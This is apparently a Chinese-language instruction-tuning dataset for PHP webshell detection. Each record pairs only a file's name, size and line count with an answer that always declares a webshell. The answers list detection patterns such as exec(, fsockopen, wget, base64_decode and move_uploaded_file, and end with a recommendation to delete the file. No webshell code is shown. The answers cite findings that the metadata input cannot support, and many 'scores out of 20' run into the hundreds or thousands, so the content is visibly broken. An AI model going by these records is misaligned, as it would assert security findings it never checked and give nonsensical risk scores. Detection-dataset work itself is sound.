$_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-05.php", "malicious_score": 9, "md5_hash": "6e38561b7f1a3613283b0d2398690c68"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"other-decode.php\", \"文件类型\": \"php\", \"文件大小\": \"66109 bytes\", \"行数\": 1521}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, $_POST[, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 955/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/other-decode.php", "malicious_score": 955, "md5_hash": "6793d8ebab93e5a0f91e5a331221f331"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"不带引号的pHp一句话.php\", \"文件类型\": \"php\", \"文件大小\": \"147 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/不带引号的pHp一句话.php", "malicious_score": 6, "md5_hash": "5bcba70b2137375225d8eedcde2c0ebb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"一句话2015-06-10-01.php\", \"文件类型\": \"php\", \"文件大小\": \"54 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/一句话2015-06-10-01.php", "malicious_score": 8, "md5_hash": "a3e6d7d37079dbefc5d9d3bdb8936173"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.10.php\", \"文件类型\": \"php\", \"文件大小\": \"112 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.10.php", "malicious_score": 11, "md5_hash": "900635766d42a83a02974e034f41ce08"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.17.php\", \"文件类型\": \"php\", \"文件大小\": \"1183 bytes\", \"行数\": 62}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 53/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.17.php", "malicious_score": 53, "md5_hash": "32abdc81d5225558a398806c9f31992f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mof提权带回显带清楚命令版本.php\", \"文件类型\": \"php\", \"文件大小\": \"2963 bytes\", \"行数\": 98}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_COOKIE[, $_GET[ 恶意度评分: 51/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/mof提权带回显带清楚命令版本.php", "malicious_score": 51, "md5_hash": "6e56cd837863b2bde08650908cedf4bc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-09-09-02.php\", \"文件类型\": \"php\", \"文件大小\": \"83 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-09-09-02.php", "malicious_score": 8, "md5_hash": "0b0698a1821669b7eecb0d564e528efc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wloymzuk.php\", \"文件类型\": \"php\", \"文件大小\": \"85773 bytes\", \"行数\": 1181}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: base64_decode (, create_function ( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wloymzuk.php", "malicious_score": 8, "md5_hash": "85036075e21ad54b5a64d1859b90060e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.14.php\", \"文件类型\": \"php\", \"文件大小\": \"439 bytes\", \"行数\": 28}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.14.php", "malicious_score": 15, "md5_hash": "114a6e1af023bbccd9392936855df8cc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass-dog-2020-01-30.php\", \"文件类型\": \"php\", \"文件大小\": \"180 bytes\", \"行数\": 12}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/dog/e, $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bypass-dog-2020-01-30.php", "malicious_score": 6, "md5_hash": "8ec2f7c69693c8ec26b53fb061d57695"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"system2022-08-22-2.php\", \"文件类型\": \"php\", \"文件大小\": \"392 bytes\", \"行数\": 14}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/system2022-08-22-2.php", "malicious_score": 6, "md5_hash": "4e31daece127e1781d6ff7b6da4b351c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spy.php\", \"文件类型\": \"php\", \"文件大小\": \"74670 bytes\", \"行数\": 2136}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 92/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/spy.php", "malicious_score": 92, "md5_hash": "cd235009fa3dd33b74a5cf6c3ce7c2d2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"poison.php\", \"文件类型\": \"php\", \"文件大小\": \"49413 bytes\", \"行数\": 1216}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, exec(, system( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 814/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/poison.php", "malicious_score": 814, "md5_hash": "f3aa2ea75d665a3963a23c0252638f3d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"test.php\", \"文件类型\": \"php\", \"文件大小\": \"358 bytes\", \"行数\": 21}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, file_get_contents( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/test.php", "malicious_score": 6, "md5_hash": "4155e63948ea22ed67d6d91037e7cf9b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"admine21_decode.php\", \"文件类型\": \"php\", \"文件大小\": \"52747 bytes\", \"行数\": 994}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, shell_exec (, $_COOKIE[ 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: file_get_contents\\s*\\(\\s*[\"\\']https?://, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 547/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/admine21_decode.php", "malicious_score": 547, "md5_hash": "c2dba77eaa9553d26656ea55b4a0a7cf"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-09-09-05.php\", \"文件类型\": \"php\", \"文件大小\": \"58 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-09-09-05.php", "malicious_score": 9, "md5_hash": "b659da4c4ac7d7d8fadafc5596d5a18a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Shu1337.php\", \"文件类型\": \"php\", \"文件大小\": \"55345 bytes\", \"行数\": 15}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, eval(, base64_decode( 发现混淆技术: base64_decode, str_rot13 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/Shu1337.php", "malicious_score": 13, "md5_hash": "8dcef91c6304f51748b8decca5267ef3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2011.php\", \"文件类型\": \"php\", \"文件大小\": \"75148 bytes\", \"行数\": 2144}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 95/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2011.php", "malicious_score": 95, "md5_hash": "1bcbca14e9f11ebb37e2407381f7114e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.06.php\", \"文件类型\": \"php\", \"文件大小\": \"86 bytes\", \"行数\": 6}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.06.php", "malicious_score": 6, "md5_hash": "7a46ddd03955d7fc7d021dca20abde05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"一句话2015-06-10-02.php\", \"文件类型\": \"php\", \"文件大小\": \"68 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, call_user_func(, $_POST[, create_function( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/一句话2015-06-10-02.php", "malicious_score": 12, "md5_hash": "67da91cc65232373597d8d983e36a07c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pHp一句话扫描脚本程序.php\", \"文件类型\": \"php\", \"文件大小\": \"4207 bytes\", \"行数\": 84}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 具备文件操作能力: fopen\\s*\\( 恶意度评分: 25/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/pHp一句话扫描脚本程序.php", "malicious_score": 25, "md5_hash": "b0e842bdf83396c3ef8c71ff94e64167"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso2.5.1.php\", \"文件类型\": \"php\", \"文件大小\": \"66125 bytes\", \"行数\": 1522}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, $_POST[, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 955/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso2.5.1.php", "malicious_score": 955, "md5_hash": "dbeecd555a2ef80615f0894027ad75dc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ghost_source.php\", \"文件类型\": \"php\", \"文件大小\": \"139947 bytes\", \"行数\": 2203}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1246/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/ghost_source.php", "malicious_score": 1246, "md5_hash": "cbf64a56306c1b5d98898468fc1fdbd8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-08.php\", \"文件类型\": \"php\", \"文件大小\": \"62 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-08.php", "malicious_score": 6, "md5_hash": "93a444be22ab85d2d4ed0c95ef7acc55"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xw.php\", \"文件类型\": \"php\", \"文件大小\": \"27976 bytes\", \"行数\": 674}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, $_POST[, exec( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 45/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/xw.php", "malicious_score": 45, "md5_hash": "dd643a6dacf4f922c60669d3211645eb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bat_2.7.php\", \"文件类型\": \"php\", \"文件大小\": \"129483 bytes\", \"行数\": 3737}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 617/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/bat_2.7.php", "malicious_score": 617, "md5_hash": "1630d2ee4b843b4a50e480dda63017f3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-07.php\", \"文件类型\": \"php\", \"文件大小\": \"34 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-07.php", "malicious_score": 6, "md5_hash": "dac1ecd180adc37ecff55b682ca68d52"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"w.php\", \"文件类型\": \"php\", \"文件大小\": \"580 bytes\", \"行数\": 12}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, str_rot13(, preg_replace('/ad/e 发现混淆技术: pack\\s*\\(, str_rot13 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/w.php", "malicious_score": 13, "md5_hash": "2daecae6aac185548df7f18d7095edeb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220213_05.php\", \"文件类型\": \"php\", \"文件大小\": \"102105 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval( 发现混淆技术: gzinflate 包含网络功能: wget 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/20220213_05.php", "malicious_score": 9, "md5_hash": "c93f89c1c6a9e35b100f18451b2a0837"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.php\", \"文件类型\": \"php\", \"文件大小\": \"95104 bytes\", \"行数\": 2247}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: unpack\\s*\\(, ord\\s*\\(, chr\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 708/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/shell.php", "malicious_score": 708, "md5_hash": "791708057d8b429d91357d38edf43cc0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-06.php\", \"文件类型\": \"php\", \"文件大小\": \"69 bytes\", \"行数\": 4}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-06.php", "malicious_score": 9, "md5_hash": "c805d3948595794c70d4b34c0dd834ad"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php_niu_1.php\", \"文件类型\": \"php\", \"文件大小\": \"217 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/php_niu_1.php", "malicious_score": 6, "md5_hash": "0396bb6a40b74c40fb260aa80525c86f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.20.php\", \"文件类型\": \"php\", \"文件大小\": \"90 bytes\", \"行数\": 4}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.20.php", "malicious_score": 6, "md5_hash": "4ccbcd5f535db11e49f1d427c6653022"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lnc.php\", \"文件类型\": \"php\", \"文件大小\": \"63798 bytes\", \"行数\": 1626}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 576/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/lnc.php", "malicious_score": 576, "md5_hash": "a18a1bc5e9e40812a438d6816e020378"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-08-26-03.php\", \"文件类型\": \"php\", \"文件大小\": \"47 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-08-26-03.php", "malicious_score": 9, "md5_hash": "feb123e9fbe859c250085312141f9bad"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20220206.php\", \"文件类型\": \"php\", \"文件大小\": \"35 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/20220206.php", "malicious_score": 6, "md5_hash": "0b7c3457de2369c42e6ccc2a7838ed06"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fbi.php\", \"文件类型\": \"php\", \"文件大小\": \"390316 bytes\", \"行数\": 1632}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, exec( 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1739/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/fbi.php", "malicious_score": 1739, "md5_hash": "1fb32f8e58c8deb168c06297a04a21f1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-09-0901.php\", \"文件类型\": \"php\", \"文件大小\": \"107 bytes\", \"行数\": 9}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2022-09-0901.php", "malicious_score": 8, "md5_hash": "41a93270fb72a27923ecfef470029542"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.13.php\", \"文件类型\": \"php\", \"文件大小\": \"104 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.13.php", "malicious_score": 6, "md5_hash": "27b1130fa91325686b8177d31f74dcc1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.07.php\", \"文件类型\": \"php\", \"文件大小\": \"51 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, call_user_func( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.07.php", "malicious_score": 6, "md5_hash": "bf584e2accafb5cec00ea349772ea5f8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2020.08.20.11.php\", \"文件类型\": \"php\", \"文件大小\": \"109 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_REQUEST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/2020.08.20.11.php", "malicious_score": 11, "md5_hash": "cc396a21cfbc4d23b503755d98b448ca"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5678.php\", \"文件类型\": \"php\", \"文件大小\": \"147012 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/5678.php", "malicious_score": 13, "md5_hash": "8d435457a4ccaaa8fad4afd405e95088"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP简单小马源码.php\", \"文件类型\": \"php\", \"文件大小\": \"439 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHP简单小马源码.php", "malicious_score": 11, "md5_hash": "a524e7ae8d71e37d2fd3e5fbdab405ea"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"itsec.php\", \"文件类型\": \"php\", \"文件大小\": \"65013 bytes\", \"行数\": 1284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_POST[ 发现混淆技术: base64_decode, pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 824/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/itsec.php", "malicious_score": 824, "md5_hash": "7164b2dee5d439bc75eacc95e2a17083"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gif.php\", \"文件类型\": \"php\", \"文件大小\": \"703 bytes\", \"行数\": 16}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 具备文件操作能力: move_uploaded_file 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/gif.php", "malicious_score": 7, "md5_hash": "2da34b14c430db432fa254c8d0cbbacb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wp_backup.php\", \"文件类型\": \"php\", \"文件大小\": \"66028 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wp_backup.php", "malicious_score": 17, "md5_hash": 